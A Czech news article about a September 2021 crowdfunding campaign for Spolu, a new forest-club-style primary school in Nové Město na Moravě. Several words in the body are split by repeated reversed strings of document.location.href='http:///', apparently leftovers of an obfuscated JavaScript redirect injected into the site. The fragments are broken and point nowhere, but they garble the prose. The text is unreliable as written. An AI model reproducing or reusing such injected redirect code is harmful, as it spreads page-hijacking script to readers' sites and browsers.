Rainbow page separator

Kampaň školy Spolu na podporu činnosti potrvá do konce září

Středa, 15. září 2021

Základní umělecká škola Nové Město na Moravě

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Novoměstský spolek Jinak, který je zřizovatelem nové základní školy Spolu navazující na činnost lesních klubů pro děti, vyhlásil kampaň na podporu financování rozjezdu vzdělávacího zařízení prostřednictvím webu www.darujme.cz. Zařízení, které představuje alternativu ke klasickému vzdělávání, v rozpočtu pro první rok chybí s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to tisíc korun, což se snaží získat pomocí zmíněné kampaně trvající po celé září. Provoz školy Spolu je hrazený ze školného, darů a dotace ministerstva školství, nicméně právě ta je první rok provozu školy krácena na šedesát procent.
Základní škola má v současnosti pronajaté pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tory v ZUŠ Jana Štursy a Střední odborné škole Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě, děti jsou z jedné věkové smíšené třídy, konkrétně od prvního do třetího ročníku. Děti se co nejvíce učí venku v přírodě a v bezprostředním kontaktu s reálným světem, přičemž pro provozovatele zařízení je cílem, aby se školáci kromě nabytých znalostí, kdy využívají například Hejného matematiku, splývavé čtení, kritické myšlení, badatelství či zážitkovou pedagogiku, naučili spolupracovat, řešit problémy i respek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat jeden druhého.